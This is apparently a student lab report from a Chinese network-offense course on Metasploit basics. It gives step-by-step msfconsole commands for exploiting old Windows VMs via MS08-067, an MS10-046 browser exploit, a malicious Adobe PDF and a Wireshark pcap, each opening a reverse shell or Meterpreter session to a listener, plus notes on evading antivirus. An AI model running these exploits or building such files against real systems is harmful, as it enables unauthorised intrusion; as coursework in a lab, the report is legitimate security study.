2019-2020-2 20175322周弋鸿 《网络对抗技术》Exp6 MSF基础应用
实验目标
实验对象
- Kali Linux
- Windows 2000
- Windows XP sp3 简体中文
- Windows XP sp2 英文
- Windows XP sp3 英文
实验内容
- 成功主动攻击,如ms08-067
- 成功针对浏览器的攻击,如ms11-050
- 成功针对客户端的攻击,如Adobe
- 成功应用辅助模块的攻击
实验要求
- 掌握metasploit的基本应用方式,重点是常用的三种攻击方式的思路
- 实践可不限于示例,并要求至少有一个是和其他所有同学不一样
预备知识
MSF模块使用
msfconsole
进入控制台- 确定寻找的漏洞,然后输入
search 漏洞名
查找相应模块 info
查看靶机适用范围show payloads
查看相关载荷set payload generic/shell_reverse_tcp
选择载荷show options
查看相关参数- 进行参数配置
set RHOST xxx.xxx.xxx.xxx//靶机IP
set LPORT 5322
set LHOST 192.168.132.255//攻击机IP
set target 0
- 利用辅助模块查看端口是否开启(默认端口为445)
msfconsole//进入控制台
search portscan //搜索端口
use auxiliary/scanner/portscan/tcp //使用漏洞模块
set RHOSTS xxx.xxx.xxx.xxx //设置靶机地址
exploit //攻击
exploit
侦听
实验步骤
1、主动攻击
-
进入msf,使用
search ms08-067
查看漏洞位置
-
使用
use exploit/windows/smb/ms08_067_netapi
选择该漏洞 -
使用
show payloads
查看可用载荷
-
使用
set payload generic/shell_reverse_tcp
设置攻击有效载荷 -
show options
查看设置信息
-
info
查看靶机适用范围
-
选择合适靶机
-
使用
set LHOST 192.168.132.255
设置监听者地址 -
使用
set LPORT 5322
设置监听者端口 -
set RHOST 192.168.122.129
设置靶机地址 -
exploit
开始攻击 -
靶机出现错误并马上关机,上网查找因为攻击导致LSASS.EXE停止响应,此程序使操作系统在60秒钟后强行关机
-
LSASS.EXE是一个系统进程,用于微软Windows系统的安全机制,它用于本地安全和登陆策略并且无法终止,所以windows 2000攻击失败
-
换成windows xp sp3中文试试,
session
对象创建失败,可能是已经安装了KB958644
补丁或者445
端口未开放 -
点击
开始
,进入控制面板
,进入添加或删除程序
,勾选左上角查看已安装的更新
,找到相应补丁,删了,显示端口有问题
-
关闭防火墙,进入命令行,输入
netstat -an
查看,445
端口打开,还是失败,可能对中文版支持有问题,换英文版 -
重复以上过程,windows xp sp2英文依旧创建失败
-
最后,换windows xp sp3英文实验
2、针对浏览器的攻击
-
payload:
windows/meterpreter/reverse_tcp
-
选择
ms10_046_shortcut_icon_dllloader.rb
-
使用:
use windows/browser/ms10_046_shortcut_icon_dllloader
-
输入:
show payloads //显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp //选择攻击载荷
set LHOST 192.168.132.255 //设置监听地址
exploit //进行攻击
3、针对客户端的攻击(唯一)
-
查找Adobe漏洞:
search adobe
-
使用漏洞:
use windows/fileformat/adobe_cooltype_sing
-
payload:
windows/meterpreter/reverse_tcp
-
攻击者地址:
set LHOST 192.168.132.255
-
设置生成pdf文件的文件名:
set FILENAME 20175322.pdf
-
攻击:
exploit
-
将生成的文件复制之后导入靶机,双击打开
-
更换端口号,成功
4、辅助模块攻击
- 使用漏洞:
use exploit/windows/fileformat/wireshark_packet_dect.rb
- 选择攻击载荷:
set payload windows/meterpreter/reverse_tcp
- 设置相关参数:
set LHOST 192.168.132.255 //攻击者地址
set LPORT 5322 //设置端口号
set FILENAME 5322.pcap //设置文件名
show options //查看设置
exploit //攻击
- 将生成的
5322.pcap
复制到Windows XP中 - 进入监听模块
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp //选择攻击载荷
set LHOST 192.168.132.255 //攻击者地址
set LPORT 5322 //设置端口号
exploit //攻击
- 靶机中使用wireshark打开
5322.pcap
实验报告
1、基础问题回答
1、用自己的话解释什么是exploit,payload,encode。
- exploit是渗透攻击,就是对漏洞的利用,分为主动渗透攻击与被动渗透攻击,通过漏洞对靶机进行一些非授权操作
- payload是载荷的意思,就是一段shellcode攻击代码,具有反弹连接、创建用户、执行其他系统命令的功能
- encode是编码,通过改变shellcode的编码格式来对攻击代码进行伪装,在MSF攻击过程中对payload进行包装,帮助其避免被杀软发现
2、离实战还缺些什么技术或步骤?
- 首先应该是信息收集和技术的适用性。目前我所掌握的这些渗透技术局限性太大,全都需要特定的windows版本支持。进行实战要么需要先知道靶机信息要么就要使攻击方式对大部分系统都有效
- 其次是技术的有效性。现在我使用的都是一些比较老的漏洞,随着版本更新漏洞也在一一消除,现在学会的方式都有着时效性
- 最后是伪装和免杀处理。实验过程中把防火墙、安全软件都关了,正常情况下将后门程序植入靶机需要突破重重封锁。
2、实验感想
- 本次实验,加深了我对MSF模块的使用,对于特定漏洞的攻击方式也掌握的比较熟练了
- 不过实验中绝大多数的时间花费在找靶机装虚拟机上,msf的渗透攻击有很大的局限性。同时就算找到对应靶机,打过补丁也会攻击失败
- kali里的msf自身应该也有问题,有几个虚拟机符合靶机条件,防火墙关闭,能互相ping通,特定端口开放,没有打对应补丁,最后还是session无法创建